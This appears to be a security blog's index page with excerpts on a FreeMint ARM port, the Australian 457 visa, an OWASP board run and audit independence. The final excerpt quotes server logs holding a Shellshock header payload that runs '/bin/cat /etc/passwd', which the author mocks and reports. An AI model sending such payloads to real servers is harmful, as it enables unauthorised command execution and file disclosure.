Porting Freemint to ARM – Retro Challenge RC2017/10

The Retro Challenge is an interesting idea – pick a project that is over 10 years old, and blog about working on it for a month. Most folks pick older computers that they acquire and fix up, or do something interesting, such as add network functionality to Apple II’s, or running Twitter clients over serial. These […]

Training the next generation or abolition of the Australian 457 visa

Without consultation or warning, the Australian Government has decided to abolish the speciality skilled migration 457 visa system. There is currently a great deal of confusion, but it seems that the current plan is that there are two lists of skills shortages eligible for varying lengths of temporary stay and migration outcome: The Short Term Combined Skills Shortage […]

Standing for the OWASP Board in 2017 – 2018

I am standing again for the OWASP Board, again representing the Asia Pacific region, which is a huge growth area for OWASP globally. The growth opportunities in Australia, New Zealand, Singapore, Japan, Malaysia, Philippines, and in particular, Indonesia are immense. My goals for OWASP is to transition us from a small fast growing non-profit to a healthy sustainable non-profit, […]

Independence versus conflict of interest in security reviews

I was giving a lecture to some soon to be graduating folks today, and at the end of the class, a student came up and said that he wasn’t allowed to work with auditors because “it was a conflict of interest”. No, it’s not. And here’s why. Conflict of interest It’s only conflict of interest if a […]

Some people don’t get the hint

85.25.242.250 – – [28/Sep/2014:09:20:12 -0400] “GET / HTTP/1.1” 301 281 “-” “() { foo;};echo;/bin/cat /etc/passwd” 85.25.242.250 – – [28/Sep/2014:22:30:48 -0400] “GET / HTTP/1.1” 500 178 “-” “() { foo;};echo;/bin/cat /etc/passwd” Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.